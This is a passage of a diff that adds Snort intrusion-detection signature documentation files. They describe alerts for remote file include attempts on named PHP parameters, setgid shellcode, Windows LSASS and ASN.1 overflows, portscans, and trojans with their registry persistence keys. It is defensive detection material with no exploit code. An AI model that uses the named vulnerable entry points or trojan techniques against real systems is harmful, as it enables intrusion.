+"editor_validate.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000320.txt
@@ -0,0 +1,78 @@
+
+
+Rule:
+
+--
+Sid:
+100000320
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "ScozNet ScozNews" application running on a 
+webserver. Access to the file "functions.php" using a remote file being passed 
+as the "main_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "main_path" parameter in the "functions.php" script used 
+by the "ScozNet ScozNews" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using ScozNet ScozNews
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/122-26.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-26
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a icmp
+filtered sweep was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/649.txt
@@ -0,0 +1,78 @@
+Rule:  
+--
+Sid:
+649
+--
+Summary:
+Shellcode to set the group identity to 0 (root) was detected.
+
+--
+Impact:
+If this code is executed successfully, it is possible for the current
+process to inherity root group privledges.  
+
+
+--
+Detailed Information:
+Snort detected data resembling the x86 assembly code to change the
+group identity to 0.  
+
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of an attack on a remote service, an attacker may attempt to
+take advantage of insecure coding practices and execute code of his or
+her choosing through techniques known as 'buffer-overflows',
+'format-strings' and others.  Such attacks may contain code to change
+the identity of the current group to that of the root group (setgid
+0).  
+
+--
+Ease of Attack:
+Non-trivial.  Shellcode (and just x86 assembly code in general)
+requires a fairly intimate knowledge of computer architecture, memory
+structures, and many concepts that are part of the more arcane areas
+of computing.  Furthermore, if this was in fact an attack, the
+attacker needs to have a good idea of the design of the both the
+program and the system that he or she is attacking. The x86 setgid
+call itself is not particularly difficult, and by itself is not
+harmful.  However, combined with other carefuly aimed shellcode, it
+can be quite lethal.
+
+--
+False Positives:
+Fairly high.  Large binary transfers, certain web traffic, and even
+mail traffic can trigger this rule, but are not necessarily indicative
+of actual setgid code.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Determine what stream of traffic generated this particular alert.  If
+you only have the alert but not the entire packet, examine system for
+pecularities.  If you are smart and have the entire packet (or better
+yet, all your traffic for the past n hours), attempt to determine if
+this particular sequence of characters was part of an innocent stream
+of data (large binary transfers, for example) or part of a malicious
+act against your machine.  In either case, check for other activity
+from the host in question -- both currently collected traffic and
+traffic in the future.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2526.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2526
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overrun condition in Microsoft products via the Local Security Authority
+Subsystem Service (LSASS).
+
+--
+Impact:
+Remote execution of arbitrary code.
+
+--
+Detailed Information:
+A vulnerability exists in LSASS that may present an attacker with the
+opportunity to execute code of their choosing on an affected host.
+
+The problem lies in an unchecked buffer in the LSASS service, suscessful
+exploitation may present the attacker with the opportunity to gain
+control of the affected system.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems.
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted request to the LSASS
+service that could contain harmful code to gain further access to the
+system.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Use a packet filtering firewall to deny access to TCP and UDP ports 135
+and 445, UDP ports 137 and 138 and TCP ports 139 and 593 from resources
+outside the protected network.
+
+Access should also be denied to ephemeral ports and any other ports used
+by RPC services from sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/161.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+162
+
+--
+Summary:
+Matrix is a Trojan Horse offering the attacker the ability to upload 
+files to, and download files from the victim host.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+The Trojan changes system registry settings to add the Matrix server
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+Matrix is based on the Girlfriend Trojan, see sid 145.
+
+The default name of the server application is Wincfg.exe
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added 
+
+Wincfg.exe ="<DRIVE>:\WINDOWS\Wincfg.exe"
+
+A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS83
+
+--
--- /dev/null
+++ b/doc/signatures/108.txt
@@ -0,0 +1,99 @@
+Rule:
+
+--
+Sid:
+108
+
+--
+Summary:
+QAZ is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows executable that makes 
+changes to the system registry.
+
+The Trojan changes system startup files and registry settings to add the
+QAZ sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	108	QAZ Worm Client Login access
+	731	Virus - Possible QAZ Worm (Indicates worm activity)
+	775	Virus - Possible QAZ Worm Infection (Indicates worm activity)
+	733	Virus - Possible QAZ Worm Calling Home (Indicates the worm is trying to send mail)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+
+Registry keys added are:
+
+	StartIE=C:\WINDOWS\notepad.exe qazwsx.hsq
+
+This will start the Trojan each time notepad is executed.
+
+Look for the existence of the file note.com. The file notepad.exe may have been replaced with a Trojaned version that is approximately 120 kb in size (the original is 52 kb).
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS501
+http://www.whitehats.com/info/IDS498
+http://www.whitehats.com/info/IDS499
+
+McAfee
+http://vil.nai.com/vil/content/v_98775.htm
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/w32.hllw.qaz.a.html
+
+Diamond Computer Systems Security Advisory
+http://www.diamondcs.com.au/web/alerts/qaz.htm
+
+--
--- /dev/null
+++ b/doc/signatures/407.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+407
+
+--
+
+Summary:
+This event is generated when An ICMP Destination Unreachable datagram is detected on the network with an undefined ICMP Code.  
+
+--
+
+Impact:
+ICMP Codes for Destination Unreachable datagrams are defined in RFC 792 and RFC 1812.  The datagram that generated this event is not defined in either of these RFCs.  This could be an indication of a DoS (Denial of Service) attempt against the network. 
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, improperly configured hosts, or an attempted DoS.
+
+--
+
+Attack Scenarios:
+Invalid or undefined ICMP codes should never be seen in normal network conditions.  A remote attacker could be generating these packets in an attempt to cause an DoS.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000121.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000121
+
+-- 
+Summary: 
+This event is generated when a script named "test" is accessed from a location 
+outside of EXTERNAL_NET.
+
+-- 
+
+Impact: 
+Varies depending upon the script.
+
+--
+Detailed Information:
+Generally speaking, scripts named "test" should not be accessed by anyone 
+outside of the developer's internal network. These scripts rarely lack proper 
+input sanitization, often allow unfettered access to sensitive resources, and 
+can suffer from a host of vulnerabilities due to the fact that developers 
+generally do not have security in mind when testing a script. 
+
+--
+Affected Systems:
+Any system with an improperly secured developer test script.
+
+--
+
+Attack Scenarios: 
+Attacks vary depending upon the nature of the script.
+
+-- 
+
+Ease of Attack: 
+The ease of attacks vary depending upon the nature of the script.
+
+-- 
+
+False Positives:
+Some scripts may legitimately be named "test", or developers may access these 
+scripts from outside of their internal development environment. Users who are 
+receiving an inordinate amount of false positives may wish to disable this rule.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Test scripts should be properly hardened if they are made publicly available, 
+or access to them should be restricted to authorized personnel.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000615.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000615
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_premium_sponsored.php" using a remote file being 
+passed as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_premium_sponsored.php" script used by the "Indexu" application running on 
+a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1611.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1611
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000560.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+100000560
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "eNpaper1" application running on a webserver. 
+Access to the file "root_header.php" using a remote file being passed as the 
+"ppath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "ppath" parameter in the "root_header.php" script used 
+by the "eNpaper1" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using eNpaper1
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/883.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+883
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3010.txt
@@ -0,0 +1,73 @@
+Rule: 
+
+--
+Sid: 
+3010
+
+-- 
+Summary: 
+This event is generated when an attacker attempts to find the victim's
+Windows directory with the RUX the Tick trojan.
+
+-- 
+Impact: 
+If successful, the attacker would gain unauthorized access to your
+system, enabling him to upload and execute file on your computer. The
+attacker can use this function to upload additional backdoors to the
+victim's sytem and execute them.
+
+--
+Detailed Information:
+When executed, RUX the Tick opens up its assigned port (default is
+22222) for communication with the attacker. RUX the Tick has three
+functions: Get Windows Directory, Get System Directory, and Upload And
+Execute File. Get Windows Directory and Get System Directory are used
+for reconnaissance. Upload And Execute File is mainly used to upload and
+run other backdoors onto the victim's computer.
+
+--
+Affected Systems:
+	Windows 95/98/ME/NT/2000
+
+--
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files
+because they often can be backdoors in disguise. Once the victim
+mistakenly installs the server program, the attacker usually will employ
+an IP scanner program to find the IP addresses of victims that have
+installed the program. Then the attacker enters the IP address, port
+number (which  is assigned to the server program by the attacker:
+default is 22222), and presses the connect button and he has access to
+your computer.
+
+-- 
+Ease of Attack:
+Simple.
+
+-- 
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+Corrective Action: 
+Using Windows Task Manager, kill these processes: ruxserver.exe and
+server.exe. Use Windows Explorer to find ruxserver.exe and delete the file.
+
+Keep your anti-virus programs updated with the latest definitions.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Ricky Macatee <rmacatee@sourcefire.com>
+
+-- 
+Additional References:
+
+PestPatrol:
+http://www.pestpatrol.com/PestInfo/R/RUX.ASP
+
+--
--- /dev/null
+++ b/doc/signatures/1108.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1108
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1428.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1428
+
+--
+Summary:
+This event is generated when network traffic indicating the use of a
+multimedia application is detected.
+
+--
+Impact:
+This may be a violation of corporate policy since these applications can
+be used to bypass security measures designed to restrict the flow of
+corporate information to destinations external to the corporation.
+
+--
+Detailed Information:
+Multimedia client applications can be used to view movies and listen to
+music files. Some also include file sharing facilities. Use of these
+programs may constitute a violation of company policy.
+
+Clients may also contain vulnerabilities that can give an attacker an
+attack vector for delivering Trojan horse programs and viruses.
+
+--
+Affected Systems:
+	All systems running multimedia applications
+
+--
+Attack Scenarios:
+A user can download files from a source external to the protected
+network that may contain malicious code hidden in the file giving an
+attacker the opportunity to gain access to a host inside the protected
+network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000359.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000359
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Fastpublish CMS" application running on a webserver. Access to the file "drucken.php" using a remote file being passed as the "config[fsBase]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "config[fsBase]" parameter in the "drucken.php" script used by the "Fastpublish CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Fastpublish CMS
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2383.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid:
+2383
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Microsoft implementation of the ASN.1 Library.
+
+--
+Impact:
+Serious. Execution of arbitrary code, DoS.
+
+--
+Detailed Information:
+A buffer overflow condition in the Microsoft implementation of the ASN.1 
+Library. It may be possible for an attacker to exploit this condition by 
+sending specially crafted authentication packets to a host running a 
+vulnerable operating system.
+
+When the taget system decodes the ASN.1 data, exploit code may be included 
+in the data that may be excuted on the host with system level privileges. 
+Alternatively, the malformed data may cause the service to become 
+unresponsive thus causing the DoS condition to occur.
+
+--
+Affected Systems:
+	Microsoft Windows NT
+	Microsoft Windows NT Terminal Server Edition
+	Microsoft Windows 2000
+	Microsoft Windows XP
+	Microsoft Windows 2003
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818
+
+US-CERT
+http://www.us-cert.gov/cas/techalerts/TA04-041A.html
+
+Microsoft
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/ms04-007.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2414.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2414
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the handling of ISAKMP data and SA keys.
+
+--
+Impact:
+Serious
+
+--
+Detailed Information:
+The Internet Security Association and Key Management Protocol (ISAKMP) 
+is used as a framework for an authentication method between peers using 
+secure keys.
+
+ISAKMP is a framework for authentication using cryptographic keys. It 
+specifically defines the process of key exchange as opposed to the 
+generation of a cryptographic key.
+
+ISAKMP also details the procedures for the required security 
+associations in network security services.
+
+--
+Affected Systems:
+	Kame Racoon
+
+--
+Attack Scenarios:
+The attacker may attempt to delete keys and security associations in
+hosts running the KAME IKE Daemon.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ISAKMP:
+http://www.networksorcery.com/enp/protocol/isakmp.htm
+
+RFC:
